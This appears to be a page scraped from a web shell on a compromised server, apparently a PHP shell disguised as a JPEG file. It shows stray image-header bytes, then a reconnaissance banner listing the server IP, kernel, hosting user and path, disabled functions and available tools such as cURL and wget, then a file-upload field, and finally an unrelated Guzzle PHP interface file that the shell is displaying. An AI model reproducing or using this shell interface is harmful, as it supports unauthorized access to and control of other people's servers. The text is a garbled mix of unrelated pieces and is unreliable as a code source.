����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 18.222.227.24 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/guzzle/guzzle/src/Guzzle/Stream/ |
Upload File : |
<?php namespace Guzzle\Stream; use Guzzle\Http\Message\RequestInterface; /** * Interface used for creating streams from requests */ interface StreamRequestFactoryInterface { /** * Create a stream based on a request object * * @param RequestInterface $request Base the stream on a request * @param array|resource $context A stream_context_options resource or array of parameters used to create a * stream context. * @param array $params Optional array of parameters specific to the factory * * @return StreamInterface Returns a stream object * @throws \Guzzle\Common\Exception\RuntimeException if the stream cannot be opened or an error occurs */ public function fromRequest(RequestInterface $request, $context = array(), array $params = array()); }